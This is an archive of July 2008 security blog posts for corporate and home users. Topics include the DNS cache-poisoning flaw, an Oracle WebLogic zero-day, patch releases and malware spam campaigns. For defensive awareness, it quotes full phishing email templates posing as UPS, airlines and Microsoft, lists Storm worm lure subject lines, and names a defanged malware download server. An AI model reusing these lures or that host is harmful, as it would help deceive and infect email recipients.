|
Sharing Security Developments, and Best Practices for corporate and home users
July 2008 - Posts
-
Companies using Oracle's Web Logic Server should apply protection quickly to address this serious security exposure.
Oracle Web Logic Server - Serious Zero Day (exploitable w/o authentication)
http://isc.sans.org/diary.html?storyid=4798
http://www.oracle.com/technology/deploy/security/alerts/alert_cve2008-3257.html
QUOTE: Oracle has released an emergency workaround that corrects a 0-day flaw in WebLogic Server and WebLogic Express, specifically with the Apache Connector, which is remotely exploitable without authentication.
Supported Products and Components Affected
• Oracle WebLogic Server 10.0 released through MP1
• Oracle WebLogic Server 9.0, 9.1, 9.2 released through MP3
• Oracle WebLogic Server 8.1 released through SP6
• Oracle WebLogic Server 7.0 released through SP7
• Oracle WebLogic Server 6.1 released through SP7
Patch Availability: Fixes for this vulnerability will be made available as soon as testing is completed when an updated version of this document will be uploaded and email sent to affected customers. Until fixes are available, workarounds described at
https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html
|
-
These articles and templates are excellent resources for making a good business case:
Best Practices - Importance of Making a Good Business Case
http://blogs.techrepublic.com.com/tech-manager/?p=564
http://blogs.techrepublic.com.com/tech-manager/?p=538
| Quote: |
The vast majority of unsuccessful projects fail not because of poor project management, but because of poor decisions with respect to the choice of projects. A good business case helps to make right decisions and avoid horrible waste.
There is a fallacy that a business case is a thick tedious manuscript, written by professional consultants in an incomprehensible language. It’s printed on high-quality paper stock and placed onto the top shelf of an executive’s office to be used as a breeding ground for dust bunnies. This is not a business case; this is a disaster.
The sole role of a business case is that of a communication tool, composed in a language that the target audience understands and with enough detail to facilitate decision making on his or her part. There’s no magic formula when it comes to the size of a business case. The size is irrelevant. What is relevant is that the business case provides all the necessary information to make the job of the decision maker possible. Brevity is always a virtue. | Business Case and PM Templates http://www.bizvortex.com/index.php?option=com_content&task=section&id=7&Itemid=31
|
-
-
 The recent fake UPS bills have been adapted to appear like legitimate invoices and e-tickets a customer might expect to receive by email. Folks who have recently purchased e-tickets recently, should be especially careful.
Airline invoices and e-tickets - Fake malware versions circulating
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9110883
http://www.spyware-techie.com/genericdownloaderab-trojan-found-in-fake-invoice-and-airline-e-ticket-emails/
http://www.avertlabs.com/research/blog/index.php/2008/07/25/invoice-spam-takes-flight/
http://www.avertlabs.com/research/blog/index.php/2008/07/24/fake-invoice-spam-carries-malware/
QUOTE: The e-mails, which purport to be from an airline, thank the recipient for using a new "Buy flight ticket Online" service on the airline's site, provide a log-in username and password, and say the person's credit card has been charged an amount usually in the $400 range. An attachment claims to be the invoice for the ticket and credit card charge.
However, the .zip file format attachment is a Trojan horse that steals information, including keystrokes, from the infected Windows PC and transmits that data to a server hosted in Russia, according to McAfee threat researcher Craig Schmugar.
EMAIL MESSAGES TO AVOID
These messages may appear in following general format:
From: [name] [airline_name] Airlines
Subject: Your order from {airlines} [number]
or
Online order for flight ticket [number]
Hello, Thank you for using our new service “Buy airplane ticket Online” on our website. Your account has been created:
Your login: [characters]
Your password: [characters]
Your credit card has been charged for $[number in the $400 range]
We would like to remind you that whenever you order tickets on our website you get a discount of 10%! Attached to this message is the purchase Invoice and the flight ticket. To use your ticket, simply print it on a color printed, and you are set to take off for the journey!
Kind regards,
[name]
[airline]
Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon)
|
-
Below are the first confirmed reports that new DNS exploits are now being exploited in-the-wild. There are dangers associated with unpatched or misconfigured DNS servers.
DNS cache poisoning attacks exploited in the wild
http://blogs.zdnet.com/security/?p=1590
QUOTE: Numerous independent sources are starting to see evidence of DNS cache poisoning attempts on their local networks, in what appears to be an attempt to take advantage of the “recent” DNS cache poisoning vulnerability :
Surprised? I’m not, since this was pretty logical given that the three publicly available exploits have been downloaded over 15,000 times in the last couple of days. What I’m actually surprised of is that it took so long to produce a working exploit, and the despite the media outbreak raising awareness on the potential for abuse, major international and local ISPs remain vulnerable. Ironically, remain vulnerable just like they’ve always been even though patches for a particular vulnerability were available. Insecure and misconfigured DNS servers were, and continue to be a realistic threat even in a Web 2.0 world.
More on the risks associated with these new DNS exploits can be found here:
http://msmvps.com/blogs/harrywaldron/archive/2008/07/26/avert-labs-excellent-diagrams-on-new-dns-dangers.aspx
http://msmvps.com/blogs/harrywaldron/archive/2008/07/24/new-dsn-exploits-are-being-developed-patch-your-servers-now.aspx
|
-
 The diagrams in the link below are excellent in showing how DNS resolves canonical names to numerical IP addresses, and how the bad guys can potentially manipulate these with the new exploits. Most vendors now offer security updates for DNS and these should be applied as quickly as possible to better protect corporate Internet applications and customer information (e.g., especially from potential phishing attacks).
http://www.avertlabs.com/research/blog/index.php/2008/07/23/the-cat-is-out-of-the-bag-dns-bug/
|
-
This is a good article on tactics and communication techniques when working with co-workers who create issues in the workplace.
The Thing That Drives Me Nuts About My Co-Worker
http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1566
QUOTE: For many people, bad habits are unconscious. John might not realize that clipping his fingernails in the lunchroom is repulsive. Suzy is clueless that coffee was not made to be slurped and Ed doesn't know that showering only three times per week is unhygienic (and stinky!).
Let's be honest: Nobody's perfect; not even you. Results from a recent MSN Zogby data poll show that 20 percent of workers say their co-workers have at least one habit that drives them crazy. So while your co-worker might have a more obvious bothersome tendency (like always talking on speakerphone), maybe your constant complaining about everyone else's behaviors has the same effect.
"You really only have one option when it comes to being annoyed by a fellow employee," says Donna Flagg, president of The Krysalis Group, a business and management consulting firm in New York City. "Simply let your co-worker know how you feel and politely ask them if they would mind curtailing their annoying habit."
Techniques for addressing co-worker issues
1. Ask yourself if the behavior is better described as controlled or a recurring pattern
2. Check yourself
3. Be discreet
4. Be specific
5. Be positive
|
-
 As IE 8 offers improved security and support of World Wide Web Consortium (W3C) web standards, webmasters and web developers should test their applications extensively in the coming months.
Article: Microsoft confirms IE 8 will ship this year
http://blogs.zdnet.com/microsoft/?p=1500&tag=nl.e539
QUOTE: Microsoft Senior Vice President of Online Services and Windows, Bill Veghte, just told attendees that Microsoft will release the final version of Internet Explorer (IE) 8 to the Web “later this year.”
Microsoft has tried its best not to provide a ship target for IE 8 — like most of its Windows client family of products. Company officials did acknowledge last month that a second public beta of IE 8 is due out in August.
Microsoft has been warning Web developers to prep for IE 8, which will be more standards-compliant, to prepare now for IE 8 by adding a new tag to their sites to keep them from breaking when viewed with IE 8.
IE Beta v2 will be available in August
http://blogs.msdn.com/ie/archive/2008/06/03/ie8-beta-2-coming-in-august.aspx
|
-
 Below are resources for corporate users related to the developments associated with the new DNS vulnerabilities. The CERT advisory has an excellent list of vendors and their current status for this issue. It is important to apply applicable security patches for DNS servers as quickly as possible due to active exploit development.
So far, two versions of exploit code have been developed for this vulnerability. While the first exploit affects DNS caching, security researcher, H.D. Moore has developed a more potent second exploit that can replace nameserver entries with the potential to redirect traffice to malicious sites (e.g., malware downloading, phishing attacks, etc).
In some ways, this new security exposure is reminiscent of the Code Worm and Blaster attacks during the earlier part of this decade. While security patches were available, many companies did not have the time or insight to patch all of their potential exposures. While there's time, security administrators should PATCH NOW.
ARTICLES: Major DNS vulnerability now public
http://cwflyris.computerworld.com/t/3374560/1676699/127883/2/
http://isc.sans.org/diary.html?storyid=4765
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
http://cwflyris.computerworld.com/t/3374560/1676699/127883/2/
http://blog.trendmicro.com/major-dns-cache-poisoning-vulnerability-patch-now/
http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=209401195
http://blog.wired.com/27bstroke6/2008/07/details-of-dns.html
QUOTE: "Patch. Today. Now. Yes, stay late." - That's the word from security researcher Dan Kaminsky, who recently presided over an unprecedented effort to coordinate a fix for a DNS vulnerability across more than 80 software and hardware vendors
Several hackers are almost certainly already developing attack code for the bug, and it will most likely crop up within the next few days, said Dave Aitel, chief technology officer at security vendor Immunity Inc. His company will eventually develop sample code for its Canvas security testing software too, a task he expects to take about a day, given the simplicity of the attack. "It's not that hard," he said. "You're not looking at a DNA-cracking effort."
The attack can be used to redirect victims to malicious servers on the Internet by targeting the DNS servers that serve as signposts for all of the Internet's traffic. By tricking an ISP's servers into accepting bad information, attackers could redirect that company's customers to malicious Web sites without their knowledge.
Although a software fix is now available for most users of DNS software, it can take time for these updates to work their way through the testing process and actually get installed on the network. "Most people have not patched yet," Vixie said. "That's a gigantic problem for the world."
EXPLOIT DEVELOPMENTS: Second more critical exploit in the wild
http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html
QUOTE: We just added a second exploit which replaces the nameservers of the target domain. This is the bug people should actually care about, since it doesn't matter if anything is already cached. Regarding the cache situation (of the first exploit) -- it's not possible to do cache overwrites, but it is possibe to look up the cache timeout, wait for it, and then replace it. With the new exploit module, we just change the DNS server for the entire domain (regardless of what is cached), so it's much more effective for wide-scale hijacking.
Microsoft DNS Patch should be applied ASAP
http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
CERT Advisory - Provides a detailed status report by vendor
http://www.kb.cert.org/vuls/id/800113
Vendor Status - Date Last Updated (see CERT advisory above for more recent updates)
3com, Inc. Unknown 10-Jul-2008
Alcatel-Lucent Unknown 23-Jul-2008
Apple Computer, Inc. Unknown 5-May-2008
AT&T Unknown 21-Apr-2008
Avaya, Inc. Vulnerable 16-Jul-2008
Avici Systems, Inc. Unknown 21-Apr-2008
Belkin, Inc. Unknown 13-Jul-2008
Blue Coat Systems Vulnerable 22-Jul-2008
BlueCat Networks, Inc. Vulnerable 22-Jul-2008
Check Point Software Technologies Not Vulnerable 23-Jul-2008
Cisco Systems, Inc. Vulnerable 10-Jul-2008
Conectiva Inc. Unknown 5-May-2008
Cray Inc. Unknown 5-May-2008
D-Link Systems, Inc. Unknown 2-May-2008
Data Connection, Ltd. Unknown 21-Apr-2008
Debian GNU/Linux Vulnerable 9-Jul-2008
djbdns Not Vulnerable 10-Jul-2008
dnsmasq Vulnerable 11-Jul-2008
DragonFly BSD Project Unknown 3-Jul-2008
EMC Corporation Unknown 21-Apr-2008
Engarde Secure Linux Unknown 5-May-2008
Ericsson Unknown 21-Apr-2008
Extreme Networks Unknown 21-Apr-2008
F5 Networks, Inc. Vulnerable 14-Jul-2008
Fedora Project Unknown 5-May-2008
Force10 Networks, Inc. Not Vulnerable 11-Jul-2008
Foundry Networks, Inc. Not Vulnerable 10-Jul-2008
FreeBSD, Inc. Vulnerable 14-Jul-2008
Fujitsu Vulnerable 18-Jul-2008
Gentoo Linux Vulnerable 12-Jul-2008
Gnu ADNS Unknown 5-May-2008
GNU glibc Unknown 5-May-2008
Hewlett-Packard Company Vulnerable 16-Jul-2008
Hitachi Unknown 21-Apr-2008
Honeywell Unknown 21-Apr-2008
IBM Corporation Vulnerable 12-Jul-2008
IBM Corporation (zseries) Unknown 5-May-2008
IBM eServer Unknown 21-Apr-2008
Infoblox Vulnerable 21-Jul-2008
Ingrian Networks, Inc. Unknown 5-May-2008
Intel Corporation Unknown 21-Apr-2008
Internet Systems Consortium Vulnerable 14-Jul-2008
JH Software Not Vulnerable 10-Jul-2008
Juniper Networks, Inc. Vulnerable 10-Jul-2008
Linux Kernel Archives Unknown 3-Jun-2008
Lucent Technologies Unknown 21-Apr-2008
Luminous Networks Unknown 21-Apr-2008
Mandriva, Inc. Vulnerable 22-Jul-2008
MaraDNS Not Vulnerable 10-Jul-2008
Men & Mice Unknown 5-May-2008
Metasolv Software, Inc. Unknown 5-May-2008
Microsoft Corporation Vulnerable 8-Jul-2008
MontaVista Software, Inc. Unknown 5-May-2008
Motorola, Inc. Unknown 21-Apr-2008
Multinet (owned Process Software Corporation) Unknown 21-Apr-2008
Multitech, Inc. Unknown 21-Apr-2008
NEC Corporation Not Vulnerable 18-Jul-2008
NetApp Unknown 3-Jul-2008
NetBSD Unknown 5-May-2008
Netgear, Inc. Unknown 21-Apr-2008
Network Appliance, Inc. Unknown 21-Apr-2008
Nixu Vulnerable 9-Jul-2008
NLnet Labs Not Vulnerable 10-Jul-2008
Nokia Unknown 21-Apr-2008
Nominum Vulnerable 10-Jul-2008
Nortel Networks, Inc. Unknown 21-Apr-2008
Novell, Inc. Vulnerable 14-Jul-2008
OpenBSD Vulnerable 24-Jul-2008
OpenDNS Not Vulnerable 10-Jul-2008
Openwall GNU/*/Linux Vulnerable 17-Jul-2008
PePLink Not Vulnerable 10-Jul-2008
Posadis project Unknown 14-Jul-2008
PowerDNS Not Vulnerable 10-Jul-2008
QNX, Software Systems, Inc. Unknown 5-May-2008
Red Hat, Inc. Vulnerable 10-Jul-2008
Redback Networks, Inc. Unknown 21-Apr-2008
Secure Computing Network Security Division Vulnerable 17-Jul-2008
Shadowsupport Unknown 5-May-2008
Siemens Unknown 8-Jul-2008
Silicon Graphics, Inc. Unknown 5-May-2008
Slackware Linux Inc. Vulnerable 12-Jul-2008
Sony Corporation Unknown 21-Apr-2008
Sun Microsystems, Inc. Vulnerable 10-Jul-2008
SUSE Linux Vulnerable 11-Jul-2008
The SCO Group Unknown 5-May-2008
Trustix Secure Linux Unknown 5-May-2008
Turbolinux Unknown 5-May-2008
Ubuntu Vulnerable 10-Jul-2008
Wind River Systems, Inc. Vulnerable 9-Jul-2008
ZyXEL Unknown 21-Apr-2008
|
-
 This new malware threat is well done from an HTML and social engineering perspective. Microsoft automatically includes MSRT with it's monthly Windows Update process, and never sends tools like this out using email. These messages should be deleted.
Windows Malicious Software Removal Tool Free Today
http://sunbeltblog.blogspot.com/2008/07/another-fake-ms-spam.html
QUOTE: As we all know, for quite some time now, spam has stopped just being a nuisance, and became a serious potential security threat. It used to be that one wouldn’t get too upset if the occasional Viagra email got through a spam filter. That’s no longer the case: Spam is a significant vector for malware infection through malicious links and social engineering, and if something gets through a spam filter — and then makes it past endpoint protection — one can have all kinds of nasty headaches.
EXAMPLE OF EMAIL MESSAGE CURRENTLY CIRCULATING
Subject: Windows Malicious Software Removal Tool Free Today.
The content in text format.
Click Here! *** Malicious link removed ***
About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers.
Microsoft respects your privacy. If you do not wish to receive this MSN
Featured Offers e-mail, please click the "Unsubscribe" link below. This will
not unsubscribe you from e-mail communications from third-party advertisers
that may appear in MSN Feature Offers. This shall not constitute an offer by
MSN. MSN shall not be responsible or liable for the advertisers' content nor
any of the goods or service advertised. Prices and item availability subject
to change without notice.
2008 Microsoft | Unsubscribe <http://www.msn.com> | More Newsletters
<http://www.msn.com> | Privacy <http://www.msn.com>
Microsoft Corporation, One Microsoft Way, Redmond, WA 98052
|
-
McAfee and other AV vendors are highlighting this latest social engineering attack. A well disquised email message appears to come from UPS. It claims that a package cannot be delivered unless the fake waybill attachment is selected.
Users selecting these attachments will be infected with malicious code from a downloader that originates from a Russian website 
United Parcel Service - Fake email for package non-delivery
http://vil.mcafeesecurity.com/vil/content/v_132901.htm
http://wcco.com/techcenter/ups.email.virus.2.771489.html
http://urbanlegends.about.com/b/2008/07/15/ups-virus-warning.htm
http://www.startribune.com/local/25464324.html
http://www.ups.com/content/us/en/about/news/service_updates/virus_us.html
QUOTE: United Parcel Service is warning of a computer virus circulating under the guise of an e-mail from UPS. According to a release from UPS, the virus is attached to an e-mail that warns readers they have a shipment that couldn't be delivered unless they click on the attachment. The e-mail claims the attachment contains a waybill that will allow the undelivered package to be picked up.
COPY OF EMAIL MESSAGE: (spoofed to appear from UPS)
"Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct. Please print out the invoice copy attached and collect the package at our office.
Your UPS"
The attached file is an executable which downloads files from the following server:
hxxp: //fixaserver (dot) ru / ldr / [Removed]
|
-
As applicable for their environment, corporate DBAs and system administrations should download, pilot test, and then install these critical security updates to better protect Oracle based applications.
QUOTE: The Critical Patch Update for July 2008 was released on July 15, 2008. Oracle strongly recommends applying the patches as soon as possible.
Oracle Security Update for July 2008
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
|
-
 Sometimes one bad apple can spoil the entire bunch. A new injection based codec attack has surfaced which can infect all multi-media files on the hard drive. For example, a malicious MP3 file can be downloaded and if the special fake codec routine is accepted, it will inject malicious code into every multi-media file that is processed. Folks should continue to only use trusted sources for music or video.
Infectious Music, Malware-Style
http://www.trustedsource.org/blog/132/Trojan-infecting-multimedia-files
http://blog.trendmicro.com/infectious-music-malware-style/
QUOTE: A malware that infects multimedia files, modifying them to require the download of a fake codec when played had recently been discovered. It infects widely used multimedia file formats such as MP3, WMA and WMV video files by injecting a malicious code. The said malware is also capable of converting files such as MP2 and MP3 into Windows Media Audio (WMA) format. When a user tries to play an infected file, a pop-up message is displayed, asking the user to download a certain codec in order to play the file. The downloaded codec is of course, nothing else but malware.
But this malware takes it to a new, and more dangerous level; it manipulates a person’s multimedia files and uses it against them. People normally keep thousands of multimedia files on their systems, especially MP3s. If each file is infected by the malware then shared through a P2P network, then the user unknowingly turns into a malware host.
|
-
 The social engineering tactices used by the Storm worm continue to be well engineered. These deceptive messages attempt to trick folks into selecting malicious links that automatically download malware to vulnerable systems.
Storm Worm - Avoid Tabloid headlines in Spam messages
http://redtape.msnbc.com/2008/07/no-presidential.html
 QUOTE: No, spammers haven’t hired a bunch of former supermarket tabloid writers. They’re just doing what they do best – exploiting human nature.
The Storm worm is the Internet's version of Broadway’s “Phantom of the Opera” -- the longest running hit show around. Storm first appeared in January 2007, teasing users with a headline about deadly storms that hit Europe -- "230 dead as storm batters Europe," it said, offering a link to a full story. Clickers found themselves infected with the Storm worm.
Storm was an immediate hit for the hackers, who managed to trick hundreds of thousands of recipients into clicking on the booby-trapped link. That enabled them to build an enormous network of hijacked computers, called a botnet, which they use to send out more spam or commit other Internet crimes.
There have been hundreds of Storm variants since the first one, sent by a loosely affiliated gang of computer criminals. Some estimates say that up to 10 million PCs have been infected with Storm at one time or another.
But in April, Microsoft updated its malicious software removal tool, much to the chagrin of the hackers. About four-fifths of the vast Storm network was cut off, said Paul Wood, a security researcher at MessageLabs.
Comprehensive list of dozens of headlines from Message Labs
http://www.msnbc.msn.com/id/25680334
|
-
There are dangerous PDF files being circulated by spammers. The new PDF based attacks typically use Javascript attacks within the document to infect vulnerable systems. Users should always avoid opening any unexpected document or link in email messages. Also, it is important to stay up-to-date on all security updates available from Adobe and other software vendors.
Malicious PDF files - Death of the Internet in 2012
http://blog.trendmicro.com/death-of-the-internet-foretold/
The malware involved in this spam run is detected by Trend Micro as TROJ_PIDIEF.JT, a Trojan that arrives as a PDF file named DOC.PDF. This file promises more information regarding the alleged Internet death.
PIDIEF Trojans are known malware droppers or downloaders, so once users click on the attached PDF file — and whether or not they believe the theory — another malware is already up and running on their systems and doing malicious routines. The death of the Internet is going to be the least of their problems after that …
Internet Storm Center - PDF Javascript based exploits
http://isc.sans.org/diary.html?storyid=4726
|
-
In the Sarbanes-Oxley forums, a good question was asked related to keeping Mac systems protected. Security is more of a "process" rather than being specifically hardware or software related. In other words, you should take the same precautionary protective measure for Apple workstations, just like Windows client PCs.
For the most part, Apple Mac computers have enjoyed a fairly good track record when it comes to security. There are a fewer in-the-wild threats and the Apple OS X operating system has a Linux-kernel based design, that is fairly secure.
Still, security is only as strong as it's weakest link. Thus you want a strong chainlinked fence to keep the fox out of the chicken coop.
Recommendations:
1. Keep all operating system, browser, and software products as up-to-date as possible on security patches.
2. Anti-virus software (anti-spyware might be beneficial also)
3. Firewall protection is always a must
4. Authentication to networks (with strong password settings, rotations, and other best practices)
5. Security policies that include the Mac environment (e.g., discouraging too much personal use, installation of non-business software, etc)
6. Use of Firefox 3 might be beneficial to look at as a complementary browser to Safari (which has suffered some recent security issues)
7. Tracking of Apple security exposures and risks as they develop (e.g., monitor Secunia, Internet Storm Center, Apple's security bulletins, FRSIRT, etc)
As noted, this list is fairly similar to keeping Windows client PCs secure. These additional links might help:
http://www.google.com/search?hl=en&q=corporate+macintosh+security+best+practices
https://security.berkeley.edu/mac.html
http://www.networkworld.com/news/2007/022707-mac-os-going-corporate.html
|
-
Microsoft have released this month's patches as part of their usual Patch Tuesday monthly cycle. This months patches are:
MS08-037 - Vulnerabilities in DNS Could Allow Spoofing (953230)
Affects: Windows 2000, XP (inc x64), Server 2003 (inc x64), Server 2008 (inc x64)
LInk: http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
MS08-038 - Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)
Affects: Windows Vista and Windows 2008 Server
Link: http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx
MS08-039 - Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
Affects: Microsoft Exchance Server 2003 & 2007
Link: http://www.microsoft.com/technet/security/Bulletin/MS08-039.mspx
MS08-040 - Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
Affects: SQL Server 7, 2000, 2005, MSDE 1.0, SQL 2000 Desktop Engine, SQL 2005 Express Edition, Windows 2000, Server 2003 & Server 2008
Link: http://www.microsoft.com/technet/security/Bulletin/MS08-040.mspx
Additional Links:
Microsoft: http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
MS Blog: http://blogs.technet.com/msrc/archive/2008/07/08/july-2008-bulletin-monthly-release.aspx
ISC: http://isc.sans.org/diary.html?storyid=4684
So far, the July updates are working well on my XP SP3 PCs at home and work ...
IMPORTANT NOTE -- Don't forget to patch SQL-Server as applicable (after pilot testing your web or client/server based applications)
|
-
-
As noted in Gary warner's excellent blog post, please avoid the following email messages in your in-box:
Storm Worm - Avoid July 4th topics offering Fireworks display
http://isc.sans.org/diary.html?storyid=4669
http://garwarner.blogspot.com/2008/07/storm-worm-salutes-our-nation-on-4th.html
QUOTE: The website, which seems to invite visitors to play a fireworks video, actually downloads the Storm malware in the form of an executable called "fireworks.exe".
Subjects
=================
Amazing firework 2008
America the Beautiful
American Independence Day
Bright and joyful Fourth of July
Celebrate Independence
Celebrating Fourth of July
Celebrating the Glory of our Nation
Celebrating the spirit of our Country
Celebrations have already begun
Fabulous Independence Day firework
God bless America
Happy Birthday, America!
Happy Independence Day
Happy Independence Day!!
Independence Day firework broke all records *
Spectacular fireworks show
Stars and Strips forever
The best of 4th of July Salute
Time for Fireworks
Wish your friends a happy Independence Day
Bodies
=================
Amazing Independence Day show
America the Beautiful
Celebrating the Glory of our Nation
God bless America
Sparkling Celebration of Independence Day
Stars and Strips forever
Super 4th!
The best firework you've ever seen
|
-
Two recent ZDNet blog posts highlight forthcoming security improvements for the next beta release of IE 8. The release to testers is planned for August. These improvements will make IE8 a worthwhile upgrade when it is released in the future.
Internet Explorer 8 Beta 2 - Will focus on security improvements
http://blogs.zdnet.com/security/?p=1396
http://blogs.zdnet.com/Bott/?p=484
QUOTE: When Microsoft's Internet Explorer 8 hits the Beta 2 milestone in August, the browser makeover will feature a full-fledged anti-malware blocker and new protections against some forms of cross-site scripting attacks. The existing phishing filter IE 7 has been renamed SmartScreen Filter and will include blacklist-based blocking of known exploit sites. Also new in IE 8 Beta 2 is an XSS Filter to detect Type-1 (reflection) attacks that can lead to cookie theft, keystroke logging, Web site defacement and credentials theft:
The new beta refresh will also include support for safer Web 2.0-type mashups, DEP (data execution protection) turned on by default in Windows Vista SP 1, domain highlighting to help flag phishing attacks and changes to the way ActiveX controls are handled.
Below are also an overview of security improvements found in the current beta version:
Internet Explorer 8 - Two New Security Improvements
http://www.itsecurity.com/features/ie8-security-features-032408/
QUOTE: IE 8's security environment benefits from the addition of two major enhancements: the Safety Filter tool and the Domain Highlighting feature. Here's a closer look at both of these new enhancements.
1. Safety Filter -- IE 8 ups the ante with a new Safety Filter that analyzes the entire URL string to search for carefully hidden signs that a Web site may be something other than it claims to be. In Microsoft's words, the Safety Filter provides "a more granular detection" capability, allowing the browser to protect users from more targeted and sophisticated attacks.
2. Domain Highlighting -- IE 8's other major new security feature is a technology that highlights the top-level domain in the browser's address bar. This enhancement might not sound like much, but it is designed to provide a hard-to-miss visual clue that will function like a traffic light. The idea is to enable users to quickly confirm that the Web site they are visiting is the site that they intended to visit.
|
-
In most cases, folks are safe to use ATMs for cash withdrawals, although this major security incident reported yesterday is alarming.
Citibank ATM breach reveals PIN security problems
http://news.yahoo.com/s/ap/20080701/ap_on_hi_te/tec_atm_breach
SAN JOSE, Calif. - Hackers broke into Citibank's network of ATMs inside 7-Eleven stores and stole customers' PIN codes, according to recent court filings that revealed a disturbing security hole in the most sensitive part of a banking record. The scam netted the alleged identity thieves millions of dollars. But more importantly for consumers, it indicates criminals were able to access PINs — the numeric passwords that theoretically are among the most closely guarded elements of banking transactions — by attacking the back-end computers responsible for approving the cash withdrawals.
It's unclear how many Citibank customers were affected by the breach, which extended at least from October 2007 to March of this year and was first reported by technology news Web site Wired.com. The bank has nearly 5,700 Citibank-branded ATMs inside 7-Eleven Inc. stores throughout the U.S., but it doesn't own or operate any of them.
That responsibility falls on two companies: Houston-based Cardtronics Inc., which owns all the machines but only operates some, and Brookfield, Wis.-based Fiserv Inc., which operates the others. A critical issue in the investigation is how the hackers infiltrated the system, a question that still hasn't been answered publicly. All that's known is they broke into the ATM network through a server at a third-party processor, which means they probably didn't have to touch the ATMs at all to pull off the heist.
They could have gained administrative access to the machines - which means they had carte blanche to grab information - through a flaw in the network or by figuring out those computers' passwords. Or it's possible they installed a piece of malicious software on a banking server to capture unencrypted PINs as they passed through.
|
|
|
|